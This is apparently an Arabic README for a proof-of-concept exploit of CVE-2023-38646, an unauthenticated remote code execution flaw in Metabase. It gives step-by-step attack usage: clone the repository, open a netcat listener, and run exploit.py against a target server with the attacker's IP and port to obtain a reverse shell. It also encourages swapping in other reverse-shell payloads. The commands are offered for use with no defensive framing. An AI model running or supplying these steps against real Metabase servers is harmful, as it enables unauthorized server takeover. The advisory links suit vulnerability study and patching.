
هذا سكربت لإثبات المفهوم (PoC) لاستغلال Metabase، وهي أداة مفتوحة المصدر لذكاء الأعمال وتحليل البيانات.
هذا نص برمجي لإثبات المفهوم (PoC) لاستغلال Metabase، وهي أداة مفتوحة المصدر للذكاء التجاري وتحليل البيانات. تتيح Metabase للمستخدمين تصور بياناتهم والتفاعل معها، مما يجعلها منصة قوية لتحليل البيانات.
هذه الثغرة، المعينة بـ CVE-2023-38646، سمحت للمهاجمين بتنفيذ أوامر عشوائية على الخادم دون الحاجة إلى أي مصادقة. كان تأثير هذا الخلل شديدًا، إذ منح وصولًا غير مصرح به إلى الخادم بمستوى صلاحيات الخادم.
استنساخ هذا المستودع
git clone https://github.com/threatHNTR/CVE-2023-38646.git
الانتقال إلى المستودع
cd CVE-2023-38646
قبل تشغيل السكربت، قم بإعداد مستمع Netcat
nc -nlvp chosen-port
تشغيل السكربت
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
الاستغلال: سيحاول السكربت إرسال شل عكسي (reverse shell) إلى خادم Metabase المستهدف. إذا نجح، ستحصل على شل على جهازك. لا تتردد في تغيير الحمولة (payload) لتجربة شل عكسية مختلفة.
نشرة GitHub الأمنية: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
نشرة Metabase الأمنية: https://www.metabase.com/blog/security-advisory
GitHub الخاص بـ Metabase: https://github.com/metabase/metabase
مدونة Assetnote - شق طريقنا إلى Pre-Auth RCE في Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/